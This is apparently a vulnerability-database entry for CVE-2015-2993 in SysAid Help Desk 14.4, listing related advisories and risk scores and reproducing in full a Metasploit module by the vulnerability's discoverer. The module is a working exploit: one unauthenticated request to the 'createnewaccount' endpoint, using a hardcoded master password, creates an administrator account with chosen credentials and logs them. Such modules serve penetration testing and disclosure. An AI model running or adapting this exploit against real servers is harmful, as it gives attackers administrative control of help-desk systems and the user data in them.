SysAid Help Desk Administrator Account Creation

🗓️ 03 Jun 2015 20:38:43Reported by Pedro Ribeiro <[email protected]>Type

SysAid Help Desk Admin Account Creation vulnerability in SysAid Help Desk allows unauthenticated user to create admin account. Exploit tested on SysAid 14.4 in Windows and Linu

Reporter	Title	Published	Views	Family All 13
0day.today	SysAid Help Desk 14.4 Multiple Vulnerabilities	4 Jun 201500:00	–	zdt
Circl	CVE-2015-2993	29 May 201815:50	–	circl
CNVD	SysAid Help Desk Restriction Bypass Vulnerability	9 Jun 201500:00	–	cnvd
CVE	CVE-2015-2993	8 Jun 201514:00	–	cve
Cvelist	CVE-2015-2993	8 Jun 201514:00	–	cvelist
Exploit DB	SysAid Help Desk 14.4 - Multiple Vulnerabilities	10 Jun 201500:00	–	exploitdb
exploitpack	SysAid Help Desk 14.4 - Multiple Vulnerabilities	10 Jun 201500:00	–	exploitpack
NVD	CVE-2015-2993	8 Jun 201514:59	–	nvd
OpenVAS	SysAid < 15.2 Multiple Vulnerabilities	11 Jun 201500:00	–	openvas
Packet Storm	SysAid Help Desk 14.4 Code Execution / Denial Of Service / Traversal / SQL Injection	3 Jun 201500:00	–	packetstorm

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SysAid Help Desk Administrator Account Creation',
        'Description' => %q{
          This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated
          user to create an administrator account. Note that this exploit will only work once. Any
          subsequent attempts will fail. On the other hand, the credentials must be verified
          manually. This module has been tested on SysAid 14.4 in Windows and Linux.
        },
        'Author' => [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2015-2993' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2015/Jun/8' ],
          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt' ],
        ],
        'DisclosureDate' => '2015-06-03'
      )
    )

    register_options(
      [
        OptPort.new('RPORT', [true, 'The target port', 8080]),
        OptString.new('TARGETURI', [ true, 'SysAid path', '/sysaid']),
        OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']),
        OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password'])
      ]
    )
  end

  def run
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], 'createnewaccount'),
      'method' => 'GET',
      'vars_get' => {
        'accountID' => Rex::Text.rand_text_numeric(4),
        'organizationName' => Rex::Text.rand_text_alpha(rand(4) + rand(8)),
        'userName' => datastore['USERNAME'],
        'password' => datastore['PASSWORD'],
        'masterPassword' => 'master123'
      }
    })
    if res && res.code == 200 && res.body.to_s =~ /Error while creating account/
      # No way to know whether this worked or not, it always says error
      print_status("The new administrator #{datastore['USERNAME']}:#{datastore['PASSWORD']} should be checked manually")

      connection_details = {
        module_fullname: fullname,
        username: datastore['USERNAME'],
        private_data: datastore['PASSWORD'],
        private_type: :password,
        access_level: 'Administrator',
        status: Metasploit::Model::Login::Status::UNTRIED
      }.merge(service_details)
      create_credential_and_login(connection_details)

    else
      print_error('Administrator account creation failed')
    end
  end
end

08 Feb 2023 14:30Current

7.1High risk

Vulners AI Score7.1

CVSS 27.5

EPSS0.55362